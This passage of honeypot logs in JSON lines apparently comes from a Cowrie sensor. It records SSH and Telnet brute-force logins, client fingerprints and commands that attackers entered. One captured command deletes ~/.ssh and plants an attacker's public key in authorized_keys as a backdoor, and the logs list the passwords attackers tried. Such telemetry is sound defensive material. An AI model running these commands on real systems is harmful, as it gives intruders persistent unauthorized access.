03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:20:02.379760Z","src_ip":"212.227.235.229","session":"97f88ad54b58"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:20:03.387846Z","src_ip":"212.227.235.229","session":"97f88ad54b58"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:20:03.633911Z","src_ip":"212.227.235.229","session":"17508199bf59"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:20:03.638426Z","src_ip":"212.227.235.229","session":"97f88ad54b58"}
{"eventid":"cowrie.session.closed","duration":33.48941493034363,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:20:12.362959Z","src_ip":"212.227.125.160","session":"3d3c8ae45cbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33204,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d63c166576d","protocol":"ssh","message":"New connection: 212.227.235.229:33204 (1.2.3.4:22) [session: 6d63c166576d]","sensor":"my-vps","timestamp":"2025-08-26T14:21:30.103144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:21:30.104056Z","src_ip":"212.227.235.229","session":"6d63c166576d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:21:30.342592Z","src_ip":"212.227.235.229","session":"6d63c166576d"}
{"eventid":"cowrie.login.success","username":"root","password":"01","message":"login attempt [root/01] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:21:31.781048Z","src_ip":"212.227.235.229","session":"6d63c166576d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:21:32.312601Z","src_ip":"212.227.235.229","session":"6d63c166576d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:21:32.313296Z","src_ip":"212.227.235.229","session":"6d63c166576d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:21:32.314119Z","src_ip":"212.227.235.229","session":"6d63c166576d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:21:32.554771Z","src_ip":"212.227.235.229","session":"6d63c166576d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:21:33.090239Z","src_ip":"212.227.235.229","session":"6d63c166576d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T14:21:33.090910Z","src_ip":"212.227.235.229","session":"6d63c166576d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T14:21:33.331513Z","src_ip":"212.227.235.229","session":"6d63c166576d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:21:33.332386Z","src_ip":"212.227.235.229","session":"6d63c166576d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36714,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b615c933c44","protocol":"ssh","message":"New connection: 212.227.235.229:36714 (1.2.3.4:22) [session: 5b615c933c44]","sensor":"my-vps","timestamp":"2025-08-26T14:21:34.392418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:21:34.398461Z","src_ip":"212.227.235.229","session":"5b615c933c44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:21:34.627619Z","src_ip":"212.227.235.229","session":"5b615c933c44"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T14:21:35.548193Z","src_ip":"212.227.235.229","session":"5b615c933c44"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:21:37.211441Z","src_ip":"212.227.235.229","session":"5b615c933c44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36724,"dst_ip":"1.2.3.4","dst_port":22,"session":"03e27ace2acb","protocol":"ssh","message":"New connection: 212.227.235.229:36724 (1.2.3.4:22) [session: 03e27ace2acb]","sensor":"my-vps","timestamp":"2025-08-26T14:21:37.470601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:21:37.471387Z","src_ip":"212.227.235.229","session":"03e27ace2acb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:21:37.711731Z","src_ip":"212.227.235.229","session":"03e27ace2acb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:21:38.715882Z","src_ip":"212.227.235.229","session":"03e27ace2acb"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:21:38.956880Z","src_ip":"212.227.235.229","session":"6d63c166576d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:21:38.958335Z","src_ip":"212.227.235.229","session":"03e27ace2acb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65468,"dst_ip":"1.2.3.4","dst_port":22,"session":"eec36bafc898","protocol":"ssh","message":"New connection: 217.72.205.35:65468 (1.2.3.4:22) [session: eec36bafc898]","sensor":"my-vps","timestamp":"2025-08-26T14:23:26.113755Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:23:26.114946Z","src_ip":"217.72.205.35","session":"eec36bafc898"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50454,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e80ac5ce758","protocol":"ssh","message":"New connection: 212.227.235.229:50454 (1.2.3.4:22) [session: 3e80ac5ce758]","sensor":"my-vps","timestamp":"2025-08-26T14:24:40.266777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:24:40.901809Z","src_ip":"212.227.235.229","session":"3e80ac5ce758"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T14:24:40.902976Z","src_ip":"212.227.235.229","session":"3e80ac5ce758"}
{"eventid":"cowrie.login.success","username":"root","password":"amir1369","message":"login attempt [root/amir1369] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:24:46.084608Z","src_ip":"212.227.235.229","session":"3e80ac5ce758"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:24:47.164934Z","src_ip":"212.227.235.229","session":"3e80ac5ce758"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37924,"dst_ip":"1.2.3.4","dst_port":23,"session":"59dc505e211f","protocol":"telnet","message":"New connection: 212.227.125.160:37924 (1.2.3.4:23) [session: 59dc505e211f]","sensor":"my-vps","timestamp":"2025-08-26T14:25:57.807925Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56377,"dst_ip":"1.2.3.4","dst_port":23,"session":"cb88ddae52eb","protocol":"telnet","message":"New connection: 212.227.125.160:56377 (1.2.3.4:23) [session: cb88ddae52eb]","sensor":"my-vps","timestamp":"2025-08-26T14:26:07.843300Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56396,"dst_ip":"1.2.3.4","dst_port":23,"session":"dfc407bade7c","protocol":"telnet","message":"New connection: 212.227.125.160:56396 (1.2.3.4:23) [session: dfc407bade7c]","sensor":"my-vps","timestamp":"2025-08-26T14:26:08.807728Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56431,"dst_ip":"1.2.3.4","dst_port":23,"session":"b4e7124c670a","protocol":"telnet","message":"New connection: 212.227.125.160:56431 (1.2.3.4:23) [session: b4e7124c670a]","sensor":"my-vps","timestamp":"2025-08-26T14:26:10.826261Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56521,"dst_ip":"1.2.3.4","dst_port":23,"session":"af6b9a7c1260","protocol":"telnet","message":"New connection: 212.227.125.160:56521 (1.2.3.4:23) [session: af6b9a7c1260]","sensor":"my-vps","timestamp":"2025-08-26T14:26:14.933305Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56642,"dst_ip":"1.2.3.4","dst_port":23,"session":"3039cff0cd35","protocol":"telnet","message":"New connection: 212.227.125.160:56642 (1.2.3.4:23) [session: 3039cff0cd35]","sensor":"my-vps","timestamp":"2025-08-26T14:26:23.159511Z"}
{"eventid":"cowrie.session.closed","duration":34.54939603805542,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:26:32.357254Z","src_ip":"212.227.125.160","session":"59dc505e211f"}
{"eventid":"cowrie.session.closed","duration":30.63096261024475,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:26:38.474186Z","src_ip":"212.227.125.160","session":"cb88ddae52eb"}
{"eventid":"cowrie.session.closed","duration":30.713829278945923,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:26:39.521493Z","src_ip":"212.227.125.160","session":"dfc407bade7c"}
{"eventid":"cowrie.session.closed","duration":30.985743284225464,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:26:41.811935Z","src_ip":"212.227.125.160","session":"b4e7124c670a"}
{"eventid":"cowrie.session.closed","duration":30.585736513137817,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:26:45.518943Z","src_ip":"212.227.125.160","session":"af6b9a7c1260"}
{"eventid":"cowrie.session.closed","duration":31.32586979866028,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:26:54.485308Z","src_ip":"212.227.125.160","session":"3039cff0cd35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58560,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a0b9b055d65","protocol":"ssh","message":"New connection: 212.227.125.160:58560 (1.2.3.4:22) [session: 9a0b9b055d65]","sensor":"my-vps","timestamp":"2025-08-26T14:26:56.097846Z"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":54636,"dst_ip":"1.2.3.4","dst_port":22,"session":"686ab76d037f","protocol":"ssh","message":"New connection: 193.32.162.145:54636 (1.2.3.4:22) [session: 686ab76d037f]","sensor":"my-vps","timestamp":"2025-08-26T14:26:56.448491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:26:56.449166Z","src_ip":"193.32.162.145","session":"686ab76d037f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T14:26:56.479420Z","src_ip":"193.32.162.145","session":"686ab76d037f"}
{"eventid":"cowrie.login.failed","username":"sol","password":"ssolana","message":"login attempt [sol/ssolana] failed","sensor":"my-vps","timestamp":"2025-08-26T14:26:56.575768Z","src_ip":"193.32.162.145","session":"686ab76d037f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:26:57.608855Z","src_ip":"193.32.162.145","session":"686ab76d037f"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.114.29","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff548616f399","protocol":"ssh","message":"New connection: 196.251.114.29:51824 (1.2.3.4:22) [session: ff548616f399]","sensor":"my-vps","timestamp":"2025-08-26T14:27:17.881935Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:27:17.902835Z","src_ip":"196.251.114.29","session":"ff548616f399"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57016,"dst_ip":"1.2.3.4","dst_port":23,"session":"5dfb79a9ce25","protocol":"telnet","message":"New connection: 212.227.235.229:57016 (1.2.3.4:23) [session: 5dfb79a9ce25]","sensor":"my-vps","timestamp":"2025-08-26T14:28:12.356183Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:28:12.551442Z","src_ip":"212.227.235.229","session":"5dfb79a9ce25"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:28:12.572294Z","src_ip":"212.227.235.229","session":"5dfb79a9ce25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35952,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c07e58e7109","protocol":"ssh","message":"New connection: 212.227.125.160:35952 (1.2.3.4:22) [session: 4c07e58e7109]","sensor":"my-vps","timestamp":"2025-08-26T14:28:23.685626Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000\\xee\u0001\u0000\u0000\\xea\u0003\u0003\\xd4\u0003\\xd2\\xf3\\xeaCG\\xf0\\xe4@\u043d\\xe3\\xa3R\\xa4Hv\\xb2\\xc8!\u0016\\xd3\u0006n\u00044\f\\xae\\xc9\u0015\\x9c #\\xba\\xb3\u001f-\\xceX\\xcd_\\\\xd2\u024e)}\\xeb@\\xd2v\\xe0\u000e\\xaf;~\\x89\\xb2\\xe8\\xbd\\xdc\\xf0\\xa0\\xf2\u0000&\\xc0+\\xc0/\\xc0,\\xc00\u0329\u0328\\xc0\t\\xc0\u0013\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000\\xee\u0001\u0000\u0000\\xea\u0003\u0003\\xd4\u0003\\xd2\\xf3\\xeaCG\\xf0\\xe4@\u043d\\xe3\\xa3R\\xa4Hv\\xb2\\xc8!\u0016\\xd3\u0006n\u00044\f\\xae\\xc9\u0015\\x9c #\\xba\\xb3\u001f-\\xceX\\xcd_\\\\xd2\u024e)}\\xeb@\\xd2v\\xe0\u000e\\xaf;~\\x89\\xb2\\xe8\\xbd\\xdc\\xf0\\xa0\\xf2\u0000&\\xc0+\\xc0/\\xc0,\\xc00\u0329\u0328\\xc0\t\\xc0\u0013\\xc0","sensor":"my-vps","timestamp":"2025-08-26T14:28:24.260638Z","src_ip":"212.227.125.160","session":"4c07e58e7109"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:28:24.261835Z","src_ip":"212.227.125.160","session":"4c07e58e7109"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":64030,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d5acb5933de","protocol":"ssh","message":"New connection: 212.227.125.160:64030 (1.2.3.4:22) [session: 7d5acb5933de]","sensor":"my-vps","timestamp":"2025-08-26T14:28:24.330145Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000\\xee\u0001\u0000\u0000\\xea\u0003\u0003\\x98\u000e\u000b\\xc0\u02cc\u0012T\\xa18\\xa5<4I\\xc4P[\\xaarW\\xf3\u044f\\x98\\x82\\xbe{\\xf2p\\xa7u6 \\xc7:\\xd0\u0016\\xdaa:\\xde!\\x9c\\xb2\u0f99\\xa9\\xe7]g\\xf2\\xe63\\xd0Wm^\\xb4^q\\xb0\\x92\\x92\\xf1\u0000&\\xc0+\\xc0/\\xc0,\\xc00\u0329\u0328\\xc0\t\\xc0\u0013\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000\\xee\u0001\u0000\u0000\\xea\u0003\u0003\\x98\u000e\u000b\\xc0\u02cc\u0012T\\xa18\\xa5<4I\\xc4P[\\xaarW\\xf3\u044f\\x98\\x82\\xbe{\\xf2p\\xa7u6 \\xc7:\\xd0\u0016\\xdaa:\\xde!\\x9c\\xb2\u0f99\\xa9\\xe7]g\\xf2\\xe63\\xd0Wm^\\xb4^q\\xb0\\x92\\x92\\xf1\u0000&\\xc0+\\xc0/\\xc0,\\xc00\u0329\u0328\\xc0\t\\xc0\u0013\\xc0","sensor":"my-vps","timestamp":"2025-08-26T14:28:24.330973Z","src_ip":"212.227.125.160","session":"7d5acb5933de"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:28:24.332402Z","src_ip":"212.227.125.160","session":"7d5acb5933de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":19018,"dst_ip":"1.2.3.4","dst_port":22,"session":"89b9ec697c48","protocol":"ssh","message":"New connection: 212.227.125.160:19018 (1.2.3.4:22) [session: 89b9ec697c48]","sensor":"my-vps","timestamp":"2025-08-26T14:28:24.944768Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T14:28:24.945444Z","src_ip":"212.227.125.160","session":"89b9ec697c48"}
